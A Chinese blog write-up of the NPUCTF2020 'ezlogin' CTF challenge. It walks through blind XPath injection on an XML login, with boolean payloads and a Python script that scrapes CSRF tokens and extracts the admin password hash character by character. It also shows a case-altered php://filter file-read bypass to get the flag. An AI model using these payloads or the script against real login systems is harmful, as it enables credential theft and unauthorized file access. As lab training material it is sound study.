[NPUCTF2020]ezlogin xPATH注入

最新推荐文章于 2024-05-31 23:11:29 发布
最新推荐文章于 2024-05-31 23:11:29 发布
阅读量433 收藏
点赞数
文章标签: java 服务器 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/125558377
版权

根据题目意思应该是获取到密码即可,账号肯定是admin或者adm1n等常用管理员账号了

会发现有时间限制,过一小会儿就必须要刷新一下,于是抓包看一下

 

可以看到是xml的格式,有token验证,一开始我就以为是携带token的xml注入了,结果发现并不是,这里考的是xPath注入

服务端用户名和密码通过xml文件存储,通过将提交的用户名和密码拼接到xPATH中进行查询

后台语法:

//root/accounts/user[username/text()=$username and password/text()=$password]

根据大佬的资料以及wp学习,xPATH注入的过程需要先获取根下节点个数,然后获取跟下面的节点个数,然后获取根下节点名

这样构造的原因是:

 

//root/accounts/user[username/text()=$username and password/text()=$password]
$username肯定是一个字符串格式,因此是""
我们要自己可以控制的话,先"闭合前面那个双引号
然后中间利用or语句进行盲判断 or ……
因为后面还有一个双引号 再加一个or ""="来进行空字符串判断为真,因此我们中间控制的语句决定着返回1还是0
'or count(/*)=1  or ''='    #非法操作
'or count(/*)=2  or ''='    #用户名或密码错误

通过count(/)获取根下节点个数,可以知道是有一个节点 

 

# 获取节点名长度
'or string-length(name(/*[1]))=4 or ''='
# bool注入获取节点
'or substring(name(/*[1]), 1, 1)='a'  or ''='

知道怎么判断后就利用大佬的脚本

import requests
import string
import time
import re
session = requests.session()
base_url = 'http://932f9bbf-355d-423a-ada1-fab454456dca.node4.buuoj.cn:81/'
success = '??'
payload = "' or substring({target},{index},1)='{char}' or '"#注入模板

chars = string.ascii_letters+string.digits#所有数字字符


def get_csrf():
    res = session.get(base_url, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36',
                                         'Cookie': 'PHPSESSID=8ad6c1a25ba4ac37acaf92d08f6dc993'}).text#返回请求的文本
    return re.findall('<input.*value="(.*?)"./>', res)[0]#利用正则获取到token的值


target = 'string(/*[1]/*[1]/*[2]/*[3])'#遍历出叶子节点
# username adm1n
# password cf7414b5bdb2e65ee43083f4ddbc4d9f
data = '<username>{username}</username><password>1</password><token>{token}</token>'#伪造格式

result = 'cf7414b5bdb2e65ee43'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36',
           'Content-Type': 'application/xml',
           'Cookie': 'PHPSESSID=8ad6c1a25ba4ac37acaf92d08f6dc993'}#伪造请求头
for i in range(20, 35):#这里因为脚本已经给出了前19位,所以从20位开始,如果没有前面的result,我们应该是range(1,35),后面任取,大一点好
    for j in chars:#每一位进行破解
        time.sleep(0.2)#防止429
        temp_payload = payload.format(target=target, index=str(i), char=j)#注入模板字符串格式化

        token = get_csrf()#token值

        temp_data = data.format(username=temp_payload, token=token)#数据已经准备就绪username以及token,不用password是因为后面有一个or,有一个为真即可
        res = session.post(url=base_url+'login.php',
                           data=temp_data, headers=headers)#请求头 请求数据 请求地址
        # print(temp_data)
        # print(res.text)
        # print(len(res.text))
        if len(res.text) == 5:#因为成功的时候返回非法操作! 五个字符,因此利用判断,其实也可以用字符串包含
            result += j
            break
    print(result)

中间token是在html属性里面,利用查找标签属性过滤即可

 代码审查已经注释了,最后获得账号密码:

adm1n
cf7414b5bdb2e65ee43083f4ddbc4d9f

账号自己改一下节点名称也就获得了,基本上就那几个

一开始我直接用这个密码去登陆了,发现不对

xml文件存储的密码一般都是md5加密的,因此我们还需要解密

gtfly123

 进去后f12可以发现

明显base64 

观察参数有一个file,应该是利用伪协议读取

php://filter/read=convert.base64-encode/resource=/flag 发现返回nonono被过滤了
因此将常用的一些字符进行大写化
?file=Php://filter/rEad=convert.basE64-encode/resource=/flag

 f12发现又是一个base64加密

 

-栀蓝-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf刷题记录
Realiy的博客
08-06 830
8月6日buuctf [MRCTF2020]Ez_bypass 知识点MD5绕过,php特性 打开得到源码 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (m
xcat:XPath注入工具
05-02
XCat是一个命令行工具,可以利用和调查XPath盲注漏洞。 有关完整的参考,请阅读此处的文档: : 它支持大量功能: 自动选择注射(运行xcat injections以获得列表) 检测xpath解析器的版本和功能,并选择最快的...
[NPUCTF2020]ezlogin (xpath盲注)
记录学习,一起进步
03-26 693
[NPUCTF2020]ezlogin (xpath盲注)
CTF常用知识点整理(个人刷题中整理)
Hopeace的博客
07-19 4193
由于是之前刷题的整理,参照了很多大神的博客,由于过于零碎,没能记录下各位大神的文章出处(以后会提高版权意识的),如有侵权,私聊补加出处或者删文章。 博主是入门半年的萌新,文章不可避免会有很多错误,还请大家指正。 ### **PHP** var_dump( ) 以列的形式展开数据,方便查看 scandir( ) 扫描某一文件夹目录 file_get_contents( ) 读取文件,拼接用'.' 如num=file_get_contents(chr(47...
青少年CTF练习平台 EzLogin exp
最新发布
2301_80395418的博客
05-31 239
【代码】青少年CTF练习平台 EzLogin exp。
[NPUCTF2020]ezlogin-XPATH注入学习
cjdgg的博客
05-13 595
[NPUCTF2020]ezlogin-XPATH注入学习 这题进入后就是一个简单的登录页面,拿御剑没有扫出别的东西,简单的sql注入试了一下也没有任何回显,爆破的话他这里有一个token一直在刷新,所以会有点麻烦,应该也不会拿爆破来考别人 后来看了别人的WP才知道是XPATH注入,以前没遇到过,也不是很了解,于是去找了篇相关文章顺带学习一下 这些是XPATH的一些基础语法和介绍 从这里可以看到它和sql注入还是很相像的,只不过XPATH注入好像没有注释符把后面的都注释掉,所以需要我们去构造闭合后面的
[NPUCTF2020]ezlogin
怪味巧克力的博客
07-16 1183
0x01 首页如上,是一个登录的页面,而且这个页面是有时间限制的,超过一定时间没登录就需要刷新页面重新登录。我们抓包看看 登录的时候一个session只能存在一定的时间,通过抓包的内容来看,这里要用到Xpath的知识点 关于Xpath参考https://www.cnblogs.com/backlion/p/8554749.html xpath注入主要有两种,一种是普通的注入,另外一种是布尔注入。普通注入对应union注入,使用|来完成和union类似的功能,布尔注入则是布尔盲注。 这里使用大佬的脚本爆破
测试XPath注入.docx
09-06
测试XPath注入 XPath 注入是指攻击者通过提交恶意的 XPath 查询来破坏应用程序的逻辑或获取未授权访问的数据的安全漏洞。XPath 是一种用于导航 XML 文档并从中获取数据的解释型语言。许多时候,一个 XPath 表达式...
xxxpwn:高级 XPath 注入工具
06-09
xxxpwn : XPath 过滤扩展工具 : 专为盲优化 XPath 1 注入攻击而设计 xxxpwn 使用各种 XPath 优化来查询来自存在 XPath 注入的位置提供的后端 XML 文档的自定义信息。 默认情况下,它会尝试检索整个远程数据库,尽管...
XPath注入漏洞利用工具XPath-XCat.zip
07-19
XCat是一个命令行程序,用于辅助XPath注入漏洞的利用。XCat使用Python编写并开放源代码。XCat正常使用需要python的SimpleXMLWriter模块。 标签:XPath
Xpath注入攻击及其防御技术研究
10-10
Xpath注入攻击及其防御技术研究 详细解释xpath攻击类型 与预防方法
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
CTF第十三天
qq_52680097的博客
06-07 140
[NCTF2019]True XML cookbook 前几天学了XXE注入,今天试试 进去后是一个登录界面,随便登一下抓包,发现POST那熟悉的XML的格式 拿之前练习的Payload来试试 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <user> <username>&xxe;&l
xpath注入[NPUCTF2020]ezlogin
qq_62046696的博客
02-09 655
false or true or true and false ,如果是两个 false or true and false 不就是false了吗。PHP://filter/string.toupper/resource=/flag 转换为大写都可以绕过。不管输入什么,很容易发现登陆就超时了,说明这里token是不断刷新的。这样构造也是一样的目的都是为了闭合后面的',为啥有两个or呢。有的时候会因为网络报错,加一个time.sleep就可以了。这条命令是判断根目录有几个结点,
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 5万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
NUAA CTF校赛Web ezlogin
WeiDuoe的博客
04-14 424
看到提示说要让传入的username和password的MD5值强相等并且username和password弱相等,于是想到如果传入的不是字符串而是数组,不但md5()函数不会报错,结果还会返回null,在强比较里面null=null为true,构造payload,username[]=1&password[]=2。file=setu于猜测是最后加了.php,于是去掉.php的后缀后最终读到了base64加密后的源码。,这样子表示可能是文件包含漏洞的考点,于是尝试读取一下源码,尝试。Ctrl+u查看源码。
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
根据提示,在代码注释中可以找到隐藏的 `e` 值。以下是给定代码的修改版本,以显示隐藏的 `e` 值: ```python from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) # Hidden e = 65537 q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值